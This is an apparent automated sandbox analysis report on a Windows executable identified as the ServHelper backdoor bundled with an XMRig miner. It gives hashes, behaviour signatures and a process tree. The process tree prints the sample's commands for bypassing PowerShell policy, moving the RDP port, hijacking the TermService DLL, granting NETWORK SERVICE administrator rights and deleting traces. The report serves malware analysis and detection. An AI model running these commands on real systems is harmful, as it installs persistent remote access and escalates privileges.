Overview

overview

10

Static

static

Unconfirme...ad.exe

windows7_x64

1

Unconfirme...ad.exe

windows10_x64

10

Analysis

  • max time kernel
    130s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-10-2021 13:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Unconfirmed 357794.crdownload.exe

  • Size

    4.3MB

  • MD5

    3170bcf7de646f8612910ab98f6d1861

  • SHA1

    71d81b3dd1747cf1c0e744fcb1809d6522eab902

  • SHA256

    bea9da3ee504f62fc074963332e96297c7fff5efb2999efc946bc518a3765c00

  • SHA512

    f232d67902f1b7fc3eb73efc7df575dcac83f5943e613e61982c78c9d4c47b18eadd6d87f2b4d040ec4125f4770a33f03b5743b3b18c34ab622b258f913b91c5

Score
10/10
servhelperxmrigbackdoorminerpersistencetrojan

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Unconfirmed 357794.crdownload.exe
    "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 357794.crdownload.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:704
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\coj5ad2o\coj5ad2o.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CD2.tmp" "c:\Users\Admin\AppData\Local\Temp\coj5ad2o\CSCC36E9A03A15D4667A77A45F61B7D4F7.TMP"
          4⤵
            PID:1732
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4076
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1792
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:592
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2016
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:2232
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2096
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3528
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2392
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3312
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2780
                  • C:\Windows\SysWOW64\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3148
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:1164
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1868
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3068
                    • C:\Windows\SysWOW64\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1680
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1496
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:3808
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:3256

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/592-700-0x0000000005150000-0x0000000005151000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/592-719-0x000000007EF10000-0x000000007EF11000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/592-701-0x0000000005152000-0x0000000005153000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-137-0x0000000007F60000-0x0000000007F61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-147-0x0000000009350000-0x0000000009351000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-128-0x00000000012D0000-0x00000000012D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-130-0x0000000004B30000-0x0000000004B31000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-131-0x0000000007670000-0x0000000007671000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-133-0x0000000007032000-0x0000000007033000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-132-0x0000000007030000-0x0000000007031000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-134-0x0000000007450000-0x0000000007451000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-135-0x00000000075F0000-0x00000000075F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-155-0x0000000007180000-0x0000000007181000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-138-0x0000000007D30000-0x0000000007D31000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-139-0x0000000008820000-0x0000000008821000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-140-0x0000000008680000-0x0000000008681000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-178-0x00000000096C0000-0x00000000096C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-142-0x00000000012D0000-0x00000000012D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-146-0x0000000009C10000-0x0000000009C11000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-129-0x00000000012D0000-0x00000000012D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-1063-0x000000007EF60000-0x000000007EF61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/704-157-0x0000000007033000-0x0000000007034000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1792-540-0x000000007E3A0000-0x000000007E3A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1792-446-0x00000000049F0000-0x00000000049F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1792-447-0x00000000049F2000-0x00000000049F3000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-115-0x0000000003C80000-0x0000000004082000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3492-116-0x0000000000400000-0x0000000001AC1000-memory.dmp

                    Filesize

                    22.8MB

                    Download

                  • memory/3492-114-0x0000000003874000-0x0000000003C7B000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3492-117-0x0000000006D50000-0x000000000714F000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3492-121-0x0000000006930000-0x0000000006931000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-125-0x00000000095F0000-0x00000000095F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-120-0x0000000007650000-0x0000000007651000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-124-0x0000000007830000-0x0000000007831000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-122-0x0000000006932000-0x0000000006933000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-126-0x0000000006934000-0x0000000006935000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-123-0x0000000006933000-0x0000000006934000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3492-119-0x0000000007150000-0x0000000007151000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4076-193-0x0000000000B70000-0x0000000000B71000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4076-180-0x0000000000B70000-0x0000000000B71000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4076-181-0x0000000000B70000-0x0000000000B71000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4076-187-0x0000000006B00000-0x0000000006B01000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4076-189-0x0000000006B02000-0x0000000006B03000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4076-217-0x000000007E350000-0x000000007E351000-memory.dmp

                    Filesize

                    4KB

                    Download